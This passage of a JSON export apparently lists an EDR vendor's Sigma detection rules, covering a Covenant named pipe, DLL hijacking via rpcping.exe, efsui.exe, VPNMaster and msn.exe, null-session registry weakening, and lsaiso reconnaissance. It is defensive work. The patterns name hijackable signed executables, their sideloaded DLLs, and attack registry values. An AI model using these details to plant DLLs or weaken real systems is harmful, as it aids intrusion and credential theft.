"https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_default_covenant_named_pipes_connection.yml",
"content": "title: Default Covenant Named Pipe Connected\nid: 76529836-bb7a-4a8e-8d1e-611c2d932858\ndescription: |\n Detects the connection to a named pipe pertaining to Covenant.\n Covenant uses Named Pipes mainly to self-replicate using SMB.\n It is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\nreferences:\n - https://riccardoancarani.github.io/2019-10-19-hunting-covenant-msbuild/\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2025/04/10\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n # Endswith here allows us to match pipes that are prefixed\n # with hosts\n PipeName|endswith: '\\gruntsvc'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76529836-bb7a-4a8e-8d1e-611c2d932858",
"rule_name": "Default Covenant Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to Covenant.\nCovenant uses Named Pipes mainly to self-replicate using SMB.\nIt is recommended to analyze the process responsible for the named pipe creation to determine its legitimacy and to look for subsequent malicious actions executed on the host.\n",
"rule_creation_date": "2025-04-10",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76548890-65e4-488f-b856-88484015c9ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618769Z",
"creation_date": "2026-03-23T11:45:34.618771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rpcping.yml",
"content": "title: DLL Hijacking via rpcping.exe\nid: 76548890-65e4-488f-b856-88484015c9ed\ndescription: |\n Detects potential Windows DLL Hijacking via rpcping.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rpcping.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\mswsock.dll'\n - '\\SspiCli.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76548890-65e4-488f-b856-88484015c9ed",
"rule_name": "DLL Hijacking via rpcping.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rpcping.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76696bce-2f0c-4731-80e0-443f0830a20f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622866Z",
"creation_date": "2026-03-23T11:45:34.622868Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622888Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blumira.com/integration/how-to-disable-null-session-in-windows/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_restrictanonymoussam_key_in_registry.yml",
"content": "title: Account Enumeration Security Lowered in Registry\nid: 76696bce-2f0c-4731-80e0-443f0830a20f\ndescription: |\n Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all usernames.\n This information can help adversaries determine which accounts exist to aid in follow-on behavior.\n It is recommended to analyze the process that modified the rigistry to look for malicious behavior or content.\nreferences:\n - https://www.blumira.com/integration/how-to-disable-null-session-in-windows/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\RestrictAnonymousSAM'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76696bce-2f0c-4731-80e0-443f0830a20f",
"rule_name": "Account Enumeration Security Lowered in Registry",
"rule_description": "Detects the modification of the Lsa Registry configuration allowing for Null Sessions to enumerate all usernames.\nThis information can help adversaries determine which accounts exist to aid in follow-on behavior.\nIt is recommended to analyze the process that modified the rigistry to look for malicious behavior or content.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76938512-d1f1-49db-bcab-466da8afd029",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098769Z",
"creation_date": "2026-03-23T11:45:34.098771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mastervpn.yml",
"content": "title: DLL Hijacking via VPNMaster software\nid: 76938512-d1f1-49db-bcab-466da8afd029\ndescription: |\n Detects potential Windows DLL Hijacking via VPNMaster software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'master_vpn-service.exe'\n ProcessSignature: 'INNOVATIVE CONNECTING PTE. LIMITED'\n ImageLoaded|endswith: '\\breakpad.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\VPNMaster\\'\n - '?:\\Program Files (x86)\\VPNMaster\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\VPNMaster\\'\n - '?:\\Program Files (x86)\\VPNMaster\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'INNOVATIVE CONNECTING PTE. LIMITED'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76938512-d1f1-49db-bcab-466da8afd029",
"rule_name": "DLL Hijacking via VPNMaster software",
"rule_description": "Detects potential Windows DLL Hijacking via VPNMaster software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76a53c24-d9cc-4c99-92e0-6e30c597bd9e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590302Z",
"creation_date": "2026-03-23T11:45:34.590308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590320Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_efsui.yml",
"content": "title: DLL Hijacking via efsui.exe\nid: 76a53c24-d9cc-4c99-92e0-6e30c597bd9e\ndescription: |\n Detects potential Windows DLL Hijacking via efsui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'efsui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.dll'\n - '\\EFSADU.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\USERENV.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76a53c24-d9cc-4c99-92e0-6e30c597bd9e",
"rule_name": "DLL Hijacking via efsui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via efsui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76c6673a-5139-46cf-af13-156a408b9b42",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605276Z",
"creation_date": "2026-03-23T11:45:34.605280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605287Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround",
"https://teamhydra.blog/2020/08/25/bypassing-credential-guard/",
"https://notes.qazeer.io/red-team-specifics/edr_bypass_with_edrsandblast#credential-guard-bypass",
"https://attack.mitre.org/techniques/T1057/"
],
"name": "t1057_lsaiso_discovery_via_findstr.yml",
"content": "title: LSASS Virtualization Status Discovered via Findstr\nid: 76c6673a-5139-46cf-af13-156a408b9b42\ndescription: |\n Detects potential reconnaissance activity targeting LSASS virtualization status through findstr commands searching for the \"lsaiso.exe\" process.\n The \"lsaiso.exe\" process indicates that LSASS (Local Security Authority Subsystem Service) is running in an isolated/virtualized environment as part of Windows security features like LSA Protection or Credential Guard.\n Attackers commonly perform this reconnaissance to determine if credential dumping techniques will be effective, as virtualized LSASS implementations provide enhanced protection against memory-based credential extraction attacks.\n It is recommended to investigate the source of these commands, review surrounding process activity for additional reconnaissance or credential access attempts, and verify that LSASS protection mechanisms are properly configured and functioning as expected.\nreferences:\n - https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround\n - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/\n - https://notes.qazeer.io/red-team-specifics/edr_bypass_with_edrsandblast#credential-guard-bypass\n - https://attack.mitre.org/techniques/T1057/\ndate: 2025/07/12\nmodified: 2025/07/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1057\n - attack.t1518\n - attack.s0057\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'lsaiso'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76c6673a-5139-46cf-af13-156a408b9b42",
"rule_name": "LSASS Virtualization Status Discovered via Findstr",
"rule_description": "Detects potential reconnaissance activity targeting LSASS virtualization status through findstr commands searching for the \"lsaiso.exe\" process.\nThe \"lsaiso.exe\" process indicates that LSASS (Local Security Authority Subsystem Service) is running in an isolated/virtualized environment as part of Windows security features like LSA Protection or Credential Guard.\nAttackers commonly perform this reconnaissance to determine if credential dumping techniques will be effective, as virtualized LSASS implementations provide enhanced protection against memory-based credential extraction attacks.\nIt is recommended to investigate the source of these commands, review surrounding process activity for additional reconnaissance or credential access attempts, and verify that LSASS protection mechanisms are properly configured and functioning as expected.\n",
"rule_creation_date": "2025-07-12",
"rule_modified_date": "2025-07-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1057",
"attack.t1518"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76dd270b-174a-47f7-9459-17314155c8cb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608825Z",
"creation_date": "2026-03-23T11:45:34.608828Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608835Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide"
],
"name": "windows_defender_eventid_1116.yml",
"content": "title: Windows Defender has Detected Malware\nid: 76dd270b-174a-47f7-9459-17314155c8cb\ndescription: |\n Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\n It is recommended to investigate the origin and legitimacy of the detected file/process.\nreferences:\n - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\ndate: 2021/10/29\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.credential_access\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.Generic\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n service: defender\ndetection:\n selection:\n EventID: 1116\n Source: Microsoft-Windows-Windows Defender\n condition: selection\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76dd270b-174a-47f7-9459-17314155c8cb",
"rule_name": "Windows Defender has Detected Malware",
"rule_description": "Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\nIt is recommended to investigate the origin and legitimacy of the detected file/process.\n",
"rule_creation_date": "2021-10-29",
"rule_modified_date": "2025-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76e42c1b-d5a7-402e-927a-f2658e7b3622",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586369Z",
"creation_date": "2026-03-23T11:45:34.586372Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586380Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msn.yml",
"content": "title: DLL Hijacking via MSN.EXE\nid: 76e42c1b-d5a7-402e-927a-f2658e7b3622\ndescription: |\n Detects a potential Windows DLL search order hijacking via msn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/11/28\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msnmsgr.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msncore.dll'\n\n filter_signature:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n filter_location:\n ImageLoaded|endswith: '\\AppData\\Local\\Microsoft\\MSN\\msncore.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "76e42c1b-d5a7-402e-927a-f2658e7b3622",
"rule_name": "DLL Hijacking via MSN.EXE",
"rule_description": "Detects a potential Windows DLL search order hijacking via msn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-11-28",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76f5d309-089f-432f-9c01-a5fd1570ea3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.697636Z",
"creation_date": "2026-03-23T11:45:34.612049Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612056Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/002/",
"https://attack.mitre.org/techniques/T1037/",
"https://attack.mitre.org/techniques/T1547/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1543_002_systemd_service_enabled.yml",
